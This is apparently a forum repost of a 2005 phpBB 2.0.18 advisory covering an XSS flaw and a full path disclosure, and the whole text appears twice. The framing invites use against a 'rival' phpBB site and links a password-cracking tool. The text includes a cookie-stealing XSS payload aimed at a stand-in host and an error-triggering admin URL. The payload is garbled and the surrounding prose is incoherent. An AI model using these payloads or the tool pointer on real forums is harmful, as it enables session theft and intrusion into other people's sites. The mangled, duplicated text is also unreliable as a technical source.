phpBB 2.0.18 XSS and Full Path Disclosure
Details: SecurityAlert
Another one is a tool, single-threaded, and it is useless. If the rival opens a phpbb or something, you can use it to run the password.
Download: http://ftpzhangxue.w205./tools/
Topic : phpBB 2.0.18 XSS and Full Path Disclosure
SecurityAlert Id : 269
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 17.12.2005
Affected Software : phpBB <= 2.0.18
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from TEAM
- --- ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
d package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
lution for all web sites.
Contact with author /.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
low HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert(’’)" X="<B "> H E L O </B>
Exploit:
<B C=">" onmouseover="alert(=’http://HOST/cookies?’+)
" X="<B "> H A L O </B>
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module[’Users’][’Disallow’] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen’t exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: /key/
TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
Oh, by the way, the top one seems to probably seem to me guess this is what it means:
Personal signature:
The personal signature you fill out is automatically attached to the bottom of your published article. Personal signatures have a limit of 512 characters.
Disable HTML tags
Allowed style tags
Allow expression icon
Find "Allow HTML tags"
Details: SecurityAlert
Another one is a tool, single-threaded, and it is useless. If the rival opens a phpbb or something, you can use it to run the password.
Download: http://ftpzhangxue.w205./tools/
Topic : phpBB 2.0.18 XSS and Full Path Disclosure
SecurityAlert Id : 269
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 17.12.2005
Affected Software : phpBB <= 2.0.18
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from TEAM
- --- ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
d package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
lution for all web sites.
Contact with author /.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
low HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert(’’)" X="<B "> H E L O </B>
Exploit:
<B C=">" onmouseover="alert(=’http://HOST/cookies?’+)
" X="<B "> H A L O </B>
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module[’Users’][’Disallow’] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen’t exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: /key/
TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
Oh, by the way, the top one seems to probably seem to me guess this is what it means:
Personal signature:
The personal signature you fill out is automatically attached to the bottom of your published article. Personal signatures have a limit of 512 characters.
Disable HTML tags
Allowed style tags
Allow expression icon
Find "Allow HTML tags"